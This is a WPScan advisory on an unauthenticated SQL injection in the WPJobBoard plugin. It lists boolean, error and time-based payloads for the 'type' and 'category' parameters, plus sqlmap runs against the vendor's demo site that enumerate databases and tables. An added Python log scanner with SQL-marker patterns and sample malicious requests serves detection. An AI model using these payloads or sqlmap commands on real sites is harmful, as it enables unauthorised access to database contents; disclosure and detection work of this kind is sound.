WPScan

WordPress Plugin Vulnerabilities

WPJobBoard < 5.7.0 - Unauthenticated SQL Injection

Description

An Unauthenticated SQL Injection vulnerability was discovered in the WPJobBoard plugin v5.6.4 for WordPress.

Vulnerable parameters: type, category.

Proof of Concept

[$] :: Payloads (Boolean-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND 2392=(SELECT (CASE WHEN (2392=2392) THEN 2392 ELSE (SELECT 8365 UNION SELECT 6110) END))-- -&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND 5421=(SELECT (CASE WHEN (5421=5421) THEN 5421 ELSE (SELECT 5942 UNION SELECT 8466) END))-- -&posted=30&results=1


[$] :: Payloads (Error-based):

/advanced-search/?query=4325&location=4325&type=7)) AND EXTRACTVALUE(4031,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(4031=4031,1))),0x717a6a7171)) AND ((1099=1099&category=2&posted=30&results=1

/advanced-search/?query=4325&location=4325&type=7&category=2)) AND EXTRACTVALUE(5255,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(5255=5255,1))),0x717a6a7171)) AND ((5637=5637&posted=30&results=1


[$] :: Payloads (Time-based blind):

/advanced-search/?query=4325&location=4325&type=7)) AND SLEEP(5)#&category=2&posted=30&results=1
/advanced-search/?query=4325&location=4325&type=7&category=2)) AND SLEEP(5)#&posted=30&results=1

[!] :: PoC (SQLMap):

sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -dbs --user-agent=X --threads=2 --disable-precon --no-cast

[*] starting @ 15:47:39 /2020-10-24/

[15:47:39] [INFO] testing connection to the target URL
[15:47:45] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:47:45] [INFO] fetching database names
[15:47:47] [WARNING] reflective value(s) found and filtering out
[15:47:47] [WARNING] the SQL query provided does not return any output
[15:47:47] [INFO] fetching number of databases
[15:47:47] [INFO] resumed: 2
[15:47:47] [INFO] retrieving the length of query output
[15:47:47] [INFO] retrieved: 18
[15:49:10] [INFO] retrieved: information_schema
[15:49:10] [INFO] retrieving the length of query output
[15:49:10] [INFO] retrieved: 18
[15:50:31] [INFO] retrieved: simpliko_wpjb_demo
available databases [2]:
[*] information_schema
[REDACTED]

[*] ending @ 15:50:31 /2020-10-24/


sqlmap --url="https://demo.wpjobboard.net/jobs/advanced-search/?query=4325&location=4325&type=7&category=2&posted=30&results=1" -D REDACTED -tables --user-agent=X --threads=4 --disable-precon --no-cast

[*] starting @ 15:51:03 /2020-10-24/

[15:51:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1 (Percona fork)
[15:51:09] [INFO] fetching tables for database: 'REDACTED'
Database: REDACTED
[32 tables]
[REDACTED]

[*] ending @ 15:51:12 /2020-10-24/ 
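Every payload above places SQL syntax in `type` or `category` on the `/advanced-search/` endpoint. A detection check for web access logs follows. It is an added example, not part of the original advisory or the plugin's code, and it assumes that legitimate values for both parameters are empty or numeric ids (as in the baseline request) and that logs use Common Log Format. The function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate `type` and `category` values are empty or plain
# numeric ids, as in the advisory's baseline request (type=7, category=2).
WATCHED = {"type", "category"}
NUMERIC = re.compile(r"[0-9]*")
# SQL fragments seen in the advisory's boolean, error and time-based payloads.
SQL_MARKERS = re.compile(r"(?i)\b(select|union|sleep|extractvalue|case\s+when)\b")
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_target(target):
    """Return [(param, decoded_value, has_sql_marker)] for one request target."""
    parts = urlsplit(target)
    if "/advanced-search" not in parts.path:
        return []
    hits = []
    # parse_qs percent-decodes names and values and turns '+' into a space.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.split("[")[0] not in WATCHED:  # also covers type[]=...
            continue
        for value in values:
            if not NUMERIC.fullmatch(value):
                hits.append((name, value, bool(SQL_MARKERS.search(value))))
    return hits

def scan(lines):
    """Return [(line_no, param, value, has_sql_marker)] for access-log lines."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            findings += [(line_no, *hit) for hit in check_target(match.group(1))]
    return findings

# Constructed sample lines (documentation IP range, not real traffic).
_PREFIX = '203.0.113.9 - - [24/Oct/2020:15:47:00 +0000] "GET '
SAMPLE_LOG = [
    _PREFIX + '/jobs/advanced-search/?query=a&type=7&category=2 HTTP/1.1" 200 5120',
    _PREFIX + '/jobs/advanced-search/?type=7%29%29%20AND%20SLEEP%285%29%23&category=2 HTTP/1.1" 200 5120',
    _PREFIX + '/jobs/advanced-search/?type=7&category=2%29%29+AND+5421%3D%28SELECT+5421%29--+- HTTP/1.1" 200 5120',
    _PREFIX + '/jobs/advanced-search/?type=full-time&category=2 HTTP/1.1" 200 5120',
    _PREFIX + '/blog/?type=news HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `has_sql_marker` flag separates likely injection attempts from values that are merely non-numeric, so the latter can be reviewed at lower priority. Parameters sent in a POST body do not appear in access logs and need inspection at a WAF or in the application.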

Affects Plugins

wpjobboard
Fixed in version 5.7.0

References

URL
https://ex-mi.ru/exploit/[2020-10-24]-[WordPress]-wpjobboard-plugin-v5.6.4.txt

Classification

Type: SQLI
OWASP top 10: A1: Injection
CWE: CWE-89

Miscellaneous

Original Researcher: Ex.Mi
Submitter: Ex.Mi
Submitter website: https://ex-mi.ru
Verified: No
WPVDB ID: c0ec5f0c-5e66-48f2-87bc-56c6f0db1898

Timeline

Publicly Published: 2020-11-25 (about 2 years ago)
Added: 2020-11-25 (about 2 years ago)
Last Updated: 2020-11-26 (about 2 years ago)
